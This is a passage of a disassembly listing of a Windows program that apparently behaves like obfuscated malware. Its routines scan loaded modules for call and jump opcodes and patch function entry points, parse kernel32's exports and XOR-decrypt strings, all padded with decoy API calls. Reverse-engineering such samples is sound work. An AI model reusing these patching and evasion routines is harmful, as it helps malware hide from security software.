mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 4
jnz short loc_402744
mov edx, ebx
sub edx, 4
movzx edx, byte ptr [eax+edx]
cmp dl, 68h
jz short loc_40271D
cmp edx, 0BEh
jz short loc_40271D
mov edx, ebx
sub edx, 5
cmp byte ptr [eax+edx], 24h
jnz short loc_402744
loc_40271D: ; CODE XREF: sub_402563+1A5�j
; sub_402563+1AD�j
lea edi, [ebp+var_10+1]
lea esi, byte_43D105
mov ecx, 7
rep movsb
mov eax, [ebp+arg_4]
add eax, [ebp+arg_8]
lea edx, [eax+ebx+5]
sub edx, 4
add eax, 7
mov ds:1[edx], eax
loc_402744: ; CODE XREF: sub_402563+178�j
; sub_402563+181�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 2
jnz short loc_4027C9
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 2
jnz short loc_4027C9
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 2
jnz short loc_4027C9
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 2
jnz short loc_4027C9
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp eax, 0E8h
jz short loc_402783
cmp eax, 0E9h
jnz short loc_4027C9
loc_402783: ; CODE XREF: sub_402563+217�j
call GetProcessHeap ; GetProcessHeap
mov eax, [ebp+arg_4]
or edx, 0FFFFFFFFh
mov ecx, [ebp+arg_8]
lea ecx, [eax+ecx+5]
add ecx, ebx
sub ecx, 4
sub edx, ecx
add edx, eax
mov eax, edx
sub eax, 4
mov [ebp+var_C], eax
call GetTickCount ; GetTickCount
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
add eax, ebx
sub eax, 4
mov edx, [ebp+var_C]
mov ds:1[eax], edx
call GetCurrentProcessId ; GetCurrentProcessId
loc_4027C9: ; CODE XREF: sub_402563+1E8�j
; sub_402563+1F1�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 1
jnz short loc_402831
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 1
jnz short loc_402831
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 1
jnz short loc_402831
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 1
jnz short loc_402831
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp al, 3Dh
jz short loc_40280C
cmp eax, 0FEh
jz short loc_40280C
cmp eax, 0FFh
jnz short loc_402831
loc_40280C: ; CODE XREF: sub_402563+299�j
; sub_402563+2A0�j
call GetProcessHeap ; GetProcessHeap
call GetCurrentProcessId ; GetCurrentProcessId
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_8]
lea edi, [edi+esi+5]
add edi, ebx
sub edi, 4
mov ds:1[edi], eax
call GetCurrentThreadId ; GetCurrentThreadId
loc_402831: ; CODE XREF: sub_402563+26D�j
; sub_402563+276�j ...
inc ebx
cmp ebx, 400h
jb loc_40257E
loc_40283E: ; CODE XREF: sub_402563+60�j
pop edi
pop esi
pop ebx
leave
retn
sub_402563 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402843 proc near ; CODE XREF: sub_402A48+7FF�p
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_22 = byte ptr -22h
var_1F = byte ptr -1Fh
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov [ebp+var_11], 0A2h
sub [ebp+var_11], 8
call IsDebuggerPresent ; IsDebuggerPresent
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_4028A8
; ---------------------------------------------------------------------------
loc_402861: ; CODE XREF: sub_402843+70�j
call GetTickCount ; GetTickCount
xor ebx, ebx
jmp short loc_402874
; ---------------------------------------------------------------------------
loc_40286A: ; CODE XREF: sub_402843+37�j
mov eax, [ebp+var_4]
cmp byte ptr [eax+ebx], 0
jnz short loc_40287C
inc ebx
loc_402874: ; CODE XREF: sub_402843+25�j
cmp ebx, 3E8h
jbe short loc_40286A
loc_40287C: ; CODE XREF: sub_402843+2E�j
lea edi, [ebp+var_26]
lea esi, dword_43D10C
mov ecx, 7
rep movsb
cmp ebx, 3E8h
jnb short loc_4028BA
mov [ebp+var_1F], 0B8h
movzx eax, [ebp+var_1F]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1F], al
inc [ebp+var_4]
loc_4028A8: ; CODE XREF: sub_402843+1C�j
mov eax, [ebp+arg_4]
sub eax, 3E8h
cmp [ebp+var_4], eax
jbe short loc_402861
jmp loc_402A43
; ---------------------------------------------------------------------------
loc_4028BA: ; CODE XREF: sub_402843+4F�j
add [ebp+var_4], 0Ah
movzx edi, [ebp+arg_8]
shl edi, 2
mov ebx, lp[edi]
and [ebp+var_8], 0
loc_4028D0: ; CODE XREF: sub_402843+162�j
mov eax, ebx
add eax, [ebp+var_8]
push eax
call sub_401D31
pop ecx
call GetProcessHeap ; GetProcessHeap
mov eax, [ebp+var_8]
movzx eax, byte ptr [ebx+eax]
cmp eax, 0E8h
jz short loc_40291F
cmp eax, 0E9h
jz short loc_40291F
call GetProcessHeap ; GetProcessHeap
and [ebp+var_C], 0
jmp short loc_402913
; ---------------------------------------------------------------------------
loc_402901: ; CODE XREF: sub_402843+D8�j
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov cl, [ebx+eax]
mov [edx+eax], cl
inc [ebp+var_C]
loc_402913: ; CODE XREF: sub_402843+BC�j
mov eax, dword_40E07C
cmp [ebp+var_C], eax
jb short loc_402901
jmp short loc_402999
; ---------------------------------------------------------------------------
loc_40291F: ; CODE XREF: sub_402843+AA�j
; sub_402843+B1�j
lea edi, [ebp+var_22]
lea esi, byte_43D113
mov ecx, 3
rep movsb
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
mov cl, [ebx+eax]
mov [edx+eax], cl
call IsDebuggerPresent ; IsDebuggerPresent
mov eax, [ebp+var_8]
lea eax, [ebx+eax+1]
mov eax, [eax]
mov [ebp+var_10], eax
mov [ebp+var_1F], 65h
movzx eax, [ebp+var_1F]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1F], al
mov eax, [ebp+var_8]
mov edx, [ebp+var_10]
mov ecx, [ebp+var_4]
add ecx, eax
sub edx, ecx
mov ecx, ebx
add ecx, eax
mov eax, edx
add eax, ecx
mov [ebp+var_1C], eax
lea edi, [ebp+var_27]
lea esi, word_43D116
mov ecx, 5
rep movsb
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
lea eax, [eax+edx+1]
mov edx, [ebp+var_1C]
mov [eax], edx
call GetCurrentThreadId ; GetCurrentThreadId
loc_402999: ; CODE XREF: sub_402843+DA�j
mov eax, dword_40E07C
add [ebp+var_8], eax
cmp [ebp+var_8], 5
jb loc_4028D0
mov [ebp+var_18], 60F2h
sub [ebp+var_18], 502Ah
mov eax, [ebp+var_8]
or edx, 0FFFFFFFFh
mov ecx, [ebp+var_4]
add ecx, eax
sub edx, ecx
mov ecx, ebx
add ecx, eax
mov eax, edx
add eax, ecx
sub eax, 4
mov [ebp+var_10], eax
mov ax, word_43D11B
mov [ebp+var_1E], ax
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
mov byte ptr [edx+eax], 0E9h
call GetCurrentProcessId ; GetCurrentProcessId
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
lea eax, [eax+edx+1]
mov edx, [ebp+var_10]
mov [eax], edx
call GetCurrentProcessId ; GetCurrentProcessId
or eax, 0FFFFFFFFh
sub eax, ebx
mov edx, [ebp+var_4]
mov ecx, [ebp+var_8]
lea edx, [edx+ecx+5]
add eax, edx
sub eax, 4
mov [ebp+var_10], eax
mov byte ptr [ebx], 0E9h
mov ds:1[ebx], eax
call GetTickCount ; GetTickCount
push [ebp+var_8]
push [ebp+var_4]
movzx edi, [ebp+arg_8]
shl edi, 4
push off_43CE84[edi]
call sub_402563
add esp, 0Ch
loc_402A43: ; CODE XREF: sub_402843+72�j
pop edi
pop esi
pop ebx
leave
retn
sub_402843 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A48 proc near ; CODE XREF: sub_40AA24+5B8�p
var_258A = word ptr -258Ah
var_2588 = dword ptr -2588h
var_2583 = byte ptr -2583h
var_2580 = dword ptr -2580h
var_21B8 = dword ptr -21B8h
var_21B4 = dword ptr -21B4h
var_21B0 = dword ptr -21B0h
var_21AC = dword ptr -21ACh
var_21A8 = dword ptr -21A8h
var_21A4 = dword ptr -21A4h
var_21A0 = dword ptr -21A0h
Buffer = _MEMORYSTATUS ptr -219Bh
var_207B = byte ptr -207Bh
var_2074 = dword ptr -2074h
var_206F = byte ptr -206Fh
var_2067 = byte ptr -2067h
var_2064 = dword ptr -2064h
var_2060 = dword ptr -2060h
var_205C = dword ptr -205Ch
var_2058 = dword ptr -2058h
var_2051 = byte ptr -2051h
var_2050 = dword ptr -2050h
var_204C = dword ptr -204Ch
var_2044 = dword ptr -2044h
var_2034 = dword ptr -2034h
hObject = dword ptr -2030h
lpAddress = dword ptr -202Ch
var_2025 = byte ptr -2025h
var_2024 = dword ptr -2024h
var_2020 = dword ptr -2020h
var_101C = dword ptr -101Ch
var_1015 = byte ptr -1015h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_C = dword ptr -0Ch
lp = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
mov eax, 258Ch
call sub_40C6B8
push ebx
push esi
push edi
call GetTickCount ; GetTickCount
call sub_402226
call GetLastError
mov [ebp+var_2025], 0
call GetVersion ; GetVersion
cmp eax, 80000000h
jnb short loc_402A81
mov [ebp+var_2025], 1
loc_402A81: ; CODE XREF: sub_402A48+30�j
lea edi, [ebp+var_2067]
lea esi, byte_43D11D
mov ecx, 3
rep movsb
mov [ebp+var_1015], 0
loc_402A9B: ; CODE XREF: sub_402A48+F5�j
cmp [ebp+var_2025], 0
jnz short loc_402AB8
movzx edi, [ebp+var_1015]
shl edi, 4
cmp byte_43CE88[edi], 1
jz short loc_402AD5
loc_402AB8: ; CODE XREF: sub_402A48+5A�j
cmp [ebp+var_2025], 0
jz short loc_402AD7
movzx edi, [ebp+var_1015]
shl edi, 4
cmp byte_43CE88[edi], 2
jnz short loc_402AD7
loc_402AD5: ; CODE XREF: sub_402A48+6E�j
jmp short loc_402B24
; ---------------------------------------------------------------------------
loc_402AD7: ; CODE XREF: sub_402A48+77�j
; sub_402A48+8B�j
movzx edi, [ebp+var_1015]
mov esi, edi
shl esi, 4
push lpLibFileName[esi] ; lpLibFileName
call LoadLibraryA ; LoadLibraryA
mov hModule[edi*4], eax
movzx edi, [ebp+var_1015]
mov esi, edi
shl esi, 4
push off_43CE7C[esi] ; lpProcName
shl edi, 2
push hModule[edi] ; hModule
call GetProcAddress ; GetProcAddress
mov lp[edi], eax
call GetTickCount ; GetTickCount
loc_402B24: ; CODE XREF: sub_402A48:loc_402AD5�j
add [ebp+var_1015], 1
movzx edi, [ebp+var_1015]
shl edi, 4
cmp off_43CE7C[edi], 0
jnz loc_402A9B
lea edi, [ebp+var_206F]
lea esi, dword_43D120
movsd
movsd
mov [ebp+var_1015], 0
loc_402B58: ; CODE XREF: sub_402A48+88A�j
movzx edi, [ebp+var_1015]
shl edi, 2
cmp lp[edi], 0
jz loc_4032B9
call IsDebuggerPresent ; IsDebuggerPresent
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, hModule[edi]
mov [ebp+var_2034], edi
cmp [ebp+var_2025], 0
jz loc_402E2B
mov [ebp+var_21A0], 51E2h
mov eax, 0D23h
mul [ebp+var_21A0]
mov [ebp+var_21A4], eax
mov [ebp+var_21A0], eax
call sub_4022BB
mov [ebp+hObject], eax
shr edi, 16h
shl edi, 16h
mov [ebp+lp], edi
call GetCurrentThreadId ; GetCurrentThreadId
mov eax, edi
add eax, 400000h
mov [ebp+var_1014], eax
xor ebx, ebx
jmp short loc_402C3A
; ---------------------------------------------------------------------------
loc_402BE4: ; CODE XREF: sub_402A48+1FB�j
mov [ebp+var_21A8], 0EAEh
mov eax, 1AEBh
mul [ebp+var_21A8]
mov [ebp+var_21AC], eax
mov [ebp+var_21A8], eax
mov eax, dword_43CFF8
add eax, 0FEFh
push eax ; ucb
push [ebp+lp] ; lp
call IsBadReadPtr ; IsBadReadPtr
mov [ebp+var_4], eax
call GetTickCount ; GetTickCount
xor [ebp+var_4], 1
shl [ebp+var_4], 2
mov edi, [ebp+var_4]
mov [ebp+ebx*4+var_1010], edi
inc ebx
add [ebp+lp], 1000h
loc_402C3A: ; CODE XREF: sub_402A48+19A�j
mov eax, [ebp+var_1014]
cmp [ebp+lp], eax
jbe short loc_402BE4
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call GlobalMemoryStatus ; GlobalMemoryStatus
call GetCurrentThreadId ; GetCurrentThreadId
and [ebp+var_101C], 0
jmp loc_402D77
; ---------------------------------------------------------------------------
loc_402C62: ; CODE XREF: sub_402A48+340�j
call GetVersion ; GetVersion
push 0FFFFh
push [ebp+var_101C]
push [ebp+hObject]
call sub_402445
add esp, 0Ch
mov [ebp+var_C], eax
mov byte ptr [ebp+var_21AC+3], 12h
movzx eax, byte ptr [ebp+var_21AC+3]
imul eax, 0C31h
mov byte ptr [ebp+var_21AC+3], al
cmp [ebp+var_C], 0
jnz short loc_402CAD
call GetCurrentThreadId ; GetCurrentThreadId
jmp loc_402D6D
; ---------------------------------------------------------------------------
loc_402CAD: ; CODE XREF: sub_402A48+259�j
and [ebp+var_21A8], 0
loc_402CB4: ; CODE XREF: sub_402A48+86C�j
mov eax, [ebp+var_21A8]
mov [ebp+lp], eax
jmp loc_402D52
; ---------------------------------------------------------------------------
loc_402CC2: ; CODE XREF: sub_402A48+311�j
mov [ebp+var_21B0], 690h
add [ebp+var_21B0], 2151h
xor ebx, ebx
loc_402CD8: ; CODE XREF: sub_402A48+2DF�j
call GetTickCount ; GetTickCount
mov edi, [ebp+lp]
shr edi, 2
shl edi, 2
add edi, [ebp+var_C]
mov edi, [edi+ebx*4]
mov [ebp+var_4], edi
and [ebp+var_4], 4
mov edi, [ebp+ebx*4+var_1010]
cmp [ebp+var_4], edi
jnz short loc_402D29
mov [ebp+var_21B4], 6D86h
mov eax, 4E3Ch
mul [ebp+var_21B4]
mov [ebp+var_21B8], eax
mov [ebp+var_21B4], eax
inc ebx
cmp ebx, 400h
jb short loc_402CD8
loc_402D29: ; CODE XREF: sub_402A48+2B5�j
cmp ebx, 3FFh
jb short loc_402D4B
call GetProcessHeap ; GetProcessHeap
mov eax, [ebp+lp]
add eax, 1000h
mov [ebp+var_21A8], eax
call GetCurrentProcessId ; GetCurrentProcessId
jmp short loc_402D9E
; ---------------------------------------------------------------------------
loc_402D4B: ; CODE XREF: sub_402A48+2E7�j
add [ebp+lp], 1000h
loc_402D52: ; CODE XREF: sub_402A48+275�j
cmp [ebp+lp], 0F000h
jbe loc_402CC2
push [ebp+var_C]
call sub_4024A8
pop ecx
call GetCurrentThreadId ; GetCurrentThreadId
loc_402D6D: ; CODE XREF: sub_402A48+260�j
add [ebp+var_101C], 10000h
loc_402D77: ; CODE XREF: sub_402A48+215�j
mov eax, [ebp+Buffer.dwTotalPhys]
sub eax, 0FFFFh
cmp [ebp+var_101C], eax
jbe loc_402C62
push [ebp+hObject] ; hObject
call CloseHandle ; CloseHandle
jmp loc_4032B9
; ---------------------------------------------------------------------------
loc_402D9E: ; CODE XREF: sub_402A48+301�j
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, lp[edi]
mov [ebp+var_1014], edi
and [ebp+var_1014], 0
loc_402DBC: ; CODE XREF: sub_402A48+3E1�j
call GetLastError
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+lp]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
mov esi, [esi+edi]
mov [ebp+edi+var_2020], esi
call GetCurrentProcessId ; GetCurrentProcessId
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+lp]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
add edi, esi
or byte ptr [edi], 2
mov byte ptr [ebp+var_21A8+3], 1Eh
movzx eax, byte ptr [ebp+var_21A8+3]
imul eax, 409Ah
mov byte ptr [ebp+var_21A8+3], al
inc [ebp+var_1014]
cmp [ebp+var_1014], 400h
jb short loc_402DBC
loc_402E2B: ; CODE XREF: sub_402A48+14B�j
cmp [ebp+var_2025], 0
jnz loc_402F0D
call GetVersion ; GetVersion
push offset aKernel32_dll ; "kernel32.dll"
call GetModuleHandleA ; GetModuleHandleA
mov [ebp+Buffer.dwTotalVirtual+3], eax
lea edi, [ebp+var_21A4+3]
lea esi, dword_43D128
mov ecx, 5
rep movsb
mov eax, [ebp+Buffer.dwTotalVirtual+3]
mov edx, eax
add edx, ds:3Ch[eax]
mov [ebp+Buffer.dwTotalPhys+3], edx
mov word ptr [ebp+Buffer.dwTotalVirtual+1], 4195h
movzx eax, word ptr [ebp+Buffer.dwTotalVirtual+1]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+Buffer.dwTotalVirtual+1], ax
mov eax, [ebp+Buffer.dwTotalVirtual+3]
mov edx, [ebp+Buffer.dwTotalPhys+3]
add edx, 78h
add eax, [edx]
mov [ebp-2194h], eax
call GetCurrentProcessId ; GetCurrentProcessId
mov eax, [ebp+Buffer.dwTotalVirtual+3]
mov edx, [ebp-2194h]
add edx, 1Ch
add eax, [edx]
mov [ebp+Buffer.dwLength+3], eax
mov eax, [ebp+Buffer.dwTotalVirtual+3]
mov edx, [ebp+Buffer.dwLength+3]
add eax, [edx]
mov [ebp-219Ch], eax
mov [ebp+Buffer.dwAvailPhys+3], 0F88h
add [ebp+Buffer.dwAvailPhys+3], 72CBh
mov [ebp+var_2074], eax
mov [ebp+Buffer.dwTotalPageFile+3], 200Bh
mov eax, [ebp+Buffer.dwTotalPageFile+3]
mov edx, eax
add edx, eax
mov [ebp+Buffer.dwTotalPageFile+3], edx
loc_402F0D: ; CODE XREF: sub_402A48+3EA�j
push 1Ch
lea eax, [ebp+var_2050]
push eax
call RtlZeroMemory ; RtlZeroMemory
mov eax, [ebp+var_2034]
mov [ebp+lpAddress], eax
call GetVersion ; GetVersion
loc_402F2C: ; CODE XREF: sub_402A48+537�j
; sub_402A48+57E�j
push 1Ch ; dwLength
lea eax, [ebp+var_2050]
push eax ; lpBuffer
push [ebp+lpAddress] ; lpAddress
call VirtualQuery ; VirtualQuery
call GetCurrentProcessId ; GetCurrentProcessId
mov eax, [ebp+var_2034]
cmp [ebp+var_204C], eax
jnz short loc_402FCB
lea edi, [ebp+var_207B]
lea esi, byte_43D12D
mov ecx, 7
rep movsb
mov eax, [ebp+var_2044]
mov [ebp+var_2060], eax
add [ebp+lpAddress], eax
cmp [ebp+var_2025], 0
jnz short loc_402F2C
mov [ebp+Buffer.dwTotalVirtual+3], 691Fh
mov eax, [ebp+Buffer.dwTotalVirtual+3]
mov edx, eax
add edx, eax
mov [ebp+Buffer.dwTotalVirtual+3], edx
push 20060000h
push 0
mov edi, [ebp+var_2060]
shr edi, 0Ch
push edi
mov edi, [ebp+var_2050]
shr edi, 0Ch
push edi
push 1000Dh
call [ebp+var_2074]
call GetCurrentThreadId ; GetCurrentThreadId
jmp loc_402F2C
; ---------------------------------------------------------------------------
loc_402FCB: ; CODE XREF: sub_402A48+509�j
movzx edi, [ebp+var_1015]
shl edi, 2
mov esi, [ebp+lpAddress]
sub esi, [ebp+var_2034]
mov dword_4118A0[edi], esi
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, lp[edi]
mov [ebp+var_1014], edi
mov eax, dword_43CFF4 ; DATA XREF: .text:loc_4403D2�r
; sub_4403F5+8C�w ...
loc_403004: ; DATA XREF: .text:0043F42D�r
; .text:loc_43F469�r ...
add eax, 1000h
push eax ; ucb
push edi ; lp
call IsBadWritePtr ; IsBadWritePtr
loc_403010: ; DATA XREF: .text:0043F529�o
; sub_4403F5+10�o
mov [ebp+var_2064], eax
mov [ebp+var_2058], 78C1h
add [ebp+var_2058], 3550h
test eax, eax
jnz loc_403269
mov [ebp+var_205C], 1FC2h
add [ebp+var_205C], 61DDh
cmp [ebp+arg_0], 0
jz loc_403233
lea edi, [ebp+Buffer.dwTotalVirtual]
lea esi, byte_43D134
xor ecx, ecx
inc ecx
rep movsb
mov eax, [ebp+var_1014]
movzx eax, byte ptr [eax]
cmp eax, 0E9h
jz short loc_403085
call GetLastError
cmp [ebp+arg_0], 1
jz loc_403269
jmp loc_403233
; ---------------------------------------------------------------------------
loc_403085: ; CODE XREF: sub_402A48+627�j
mov eax, [ebp+var_1014]
mov edx, ds:1[eax]
sub edx, 0FFFFFFFFh
lea eax, [edx+eax+4]
mov [ebp+var_2024], eax
mov [ebp+Buffer.dwTotalVirtual+3], 14DFh
mov eax, 61CEh
mul [ebp+Buffer.dwTotalVirtual+3]
mov [ebp+var_2588], eax
mov [ebp+Buffer.dwTotalVirtual+3], eax
mov byte ptr [ebp+Buffer.dwAvailVirtual+3], 0
loc_4030C7: ; CODE XREF: sub_402A48+71C�j
sub [ebp+var_2024], 5
mov eax, [ebp+var_2024]
mov [ebp+var_4], eax
loc_4030D7: ; CODE XREF: sub_402A48+6C8�j
mov eax, [ebp+var_4]
mov edx, eax
dec edx
cmp byte ptr [edx], 0
jnz short loc_403108
mov edx, eax
sub edx, 2
cmp byte ptr [edx], 0
jnz short loc_403108
mov edx, eax
sub edx, 3
cmp byte ptr [edx], 0
jnz short loc_403108
mov edx, eax
sub edx, 4
cmp byte ptr [edx], 0
jnz short loc_403108
sub eax, 5
cmp byte ptr [eax], 0
jz short loc_403112
loc_403108: ; CODE XREF: sub_402A48+698�j
; sub_402A48+6A2�j ...
call GetVersion ; GetVersion
dec [ebp+var_4]
jmp short loc_4030D7
; ---------------------------------------------------------------------------
loc_403112: ; CODE XREF: sub_402A48+6BE�j
movzx edi, byte ptr [ebp+Buffer.dwAvailVirtual+3]
shl edi, 2
mov esi, [ebp+var_4]
mov [ebp+edi+var_2580], esi
add byte ptr [ebp+Buffer.dwAvailVirtual+3], 1
movzx eax, byte ptr [esi]
cmp eax, 0E9h
jnz short loc_403169
mov [ebp+var_258A], 7AC6h
add [ebp+var_258A], 2581h
mov eax, esi
mov edx, ds:1[eax]
sub edx, 0FFFFFFFFh
lea eax, [edx+eax+4]
mov [ebp+var_2024], eax
call GetCurrentProcessId ; GetCurrentProcessId
jmp loc_4030C7
; ---------------------------------------------------------------------------
loc_403169: ; CODE XREF: sub_402A48+6ED�j
mov ebx, [ebp+var_4]
jmp short loc_4031A0
; ---------------------------------------------------------------------------
loc_40316E: ; CODE XREF: sub_402A48+75E�j
mov [ebp+var_258A], 135Dh
movzx eax, [ebp+var_258A]
imul eax, 5BAAh
mov [ebp+var_258A], ax
mov eax, [ebp+var_1014]
add eax, ebx
sub eax, [ebp+var_4]
mov dl, [ebx]
mov [eax], dl
call GetCurrentProcessId ; GetCurrentProcessId
inc ebx
loc_4031A0: ; CODE XREF: sub_402A48+724�j
cmp ebx, [ebp+var_2024]
jb short loc_40316E
loc_4031A8: ; CODE XREF: sub_402A48+7D0�j
sub byte ptr [ebp+Buffer.dwAvailVirtual+3], 1
movzx edi, byte ptr [ebp+Buffer.dwAvailVirtual+3]
shl edi, 2
mov ebx, [ebp+edi+var_2580]
loc_4031C0: ; CODE XREF: sub_402A48+7C5�j
mov byte ptr [ebx], 0
call GetTickCount ; GetTickCount
cmp byte ptr ds:1[ebx], 0
jnz short loc_4031FA
cmp byte ptr ds:2[ebx], 0
jnz short loc_4031FA
cmp byte ptr ds:3[ebx], 0
jnz short loc_4031FA
cmp byte ptr ds:4[ebx], 0
jnz short loc_4031FA
cmp byte ptr ds:5[ebx], 0
jz short loc_40320F
loc_4031FA: ; CODE XREF: sub_402A48+788�j
; sub_402A48+792�j ...
mov word ptr [ebp+Buffer.dwTotalVirtual+1], 7E10h
add word ptr [ebp+Buffer.dwTotalVirtual+1], 504Ch
inc ebx
jmp short loc_4031C0
; ---------------------------------------------------------------------------
loc_40320F: ; CODE XREF: sub_402A48+7B0�j
movzx eax, byte ptr [ebp+Buffer.dwAvailVirtual+3]
or eax, eax
jg short loc_4031A8
cmp [ebp+arg_0], 1
jz short loc_403269
lea edi, [ebp+var_2583]
lea esi, byte_43D135
mov ecx, 3
rep movsb
loc_403233: ; CODE XREF: sub_402A48+602�j
; sub_402A48+638�j
movzx eax, [ebp+var_1015]
push eax
push [ebp+lpAddress]
push [ebp+var_2034]
call sub_402843
add esp, 0Ch
mov [ebp+var_2051], 0C0h
movzx eax, [ebp+var_2051]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2051], al
loc_403269: ; CODE XREF: sub_402A48+5E4�j
; sub_402A48+632�j ...
cmp [ebp+var_2025], 0
jz short loc_4032B9
call GetLastError
and [ebp+var_1014], 0
loc_40327E: ; CODE XREF: sub_402A48+865�j
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+lp]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
mov edx, [ebp+edi+var_2020]
mov [esi+edi], edx
inc [ebp+var_1014]
cmp [ebp+var_1014], 400h
jb short loc_40327E
call GetVersion ; GetVersion
jmp loc_402CB4
; ---------------------------------------------------------------------------
loc_4032B9: ; CODE XREF: sub_402A48+122�j
; sub_402A48+351�j ...
add [ebp+var_1015], 1
movzx edi, [ebp+var_1015]
shl edi, 4
cmp off_43CE7C[edi], 0
jnz loc_402B58
call GetCurrentThreadId ; GetCurrentThreadId
pop edi
pop esi
pop ebx
leave
retn
sub_402A48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4032E2(void *Src, size_t Size)
sub_4032E2 proc near ; CODE XREF: sub_40341E+37�p
; sub_40349A+44�p
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+Size]
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_43D140
lea eax, ds:41D8B0h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
xor edi, edi
jmp short loc_403322
; ---------------------------------------------------------------------------
loc_403308: ; CODE XREF: sub_4032E2+42�j
mov eax, dword_43D140
add eax, edi
lea eax, ds:41D8B0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0AFh
mov [eax], dl
inc edi
loc_403322: ; CODE XREF: sub_4032E2+24�j
cmp edi, esi
jl short loc_403308
mov eax, dword_43D140
add eax, esi
mov byte ptr dword_41D8B0[eax], 0
mov edi, dword_43D140
add dword_43D140, 3
mov eax, dword_43D140
add eax, 5
add eax, esi
mov dword_43D140, eax
cmp eax, 0DC9h
jle short loc_40335F
and dword_43D140, 0
loc_40335F: ; CODE XREF: sub_4032E2+74�j
mov [ebp+var_4], 116h
lea eax, dword_41D8B0[edi]
pop edi
pop esi
leave
retn
sub_4032E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403370 proc near ; CODE XREF: sub_40341E+19�p
; sub_40349A+33�p
var_F = byte ptr -0Fh
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call GetVersion ; GetVersion
call GetTickCount ; GetTickCount
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_40338B: ; CODE XREF: sub_403370+20�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40338B
mov edi, eax
mov [ebp+var_6], di
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_4033C6
; ---------------------------------------------------------------------------
loc_4033A2: ; CODE XREF: sub_403370+5C�j
movzx eax, [ebp+var_2]
cmp byte ptr [ebx+eax], 5Ch
jnz short loc_4033C2
call IsDebuggerPresent ; IsDebuggerPresent
inc [ebp+var_2]
lea edi, [ebp+var_F]
lea esi, dword_43D144
movsd
movsd
jmp short loc_4033CE
; ---------------------------------------------------------------------------
loc_4033C2: ; CODE XREF: sub_403370+3A�j
dec [ebp+var_2]
loc_4033C6: ; CODE XREF: sub_403370+30�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_4033A2
loc_4033CE: ; CODE XREF: sub_403370+50�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_40340B
mov [ebp+var_4], 0
jmp short loc_4033F9
; ---------------------------------------------------------------------------
loc_4033E0: ; CODE XREF: sub_403370+99�j
movzx eax, [ebp+var_4]
mov edx, [ebp+arg_4]
movzx ecx, [ebp+var_2]
mov esi, eax
add esi, ecx
mov cl, [ebx+esi]
mov [edx+eax], cl
inc [ebp+var_4]
loc_4033F9: ; CODE XREF: sub_403370+6E�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_4033E0
loc_40340B: ; CODE XREF: sub_403370+66�j
lea edi, [ebp+var_7]
lea esi, byte_43D14C
xor ecx, ecx
inc ecx
rep movsb
pop edi
pop esi
pop ebx
leave
retn
sub_403370 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
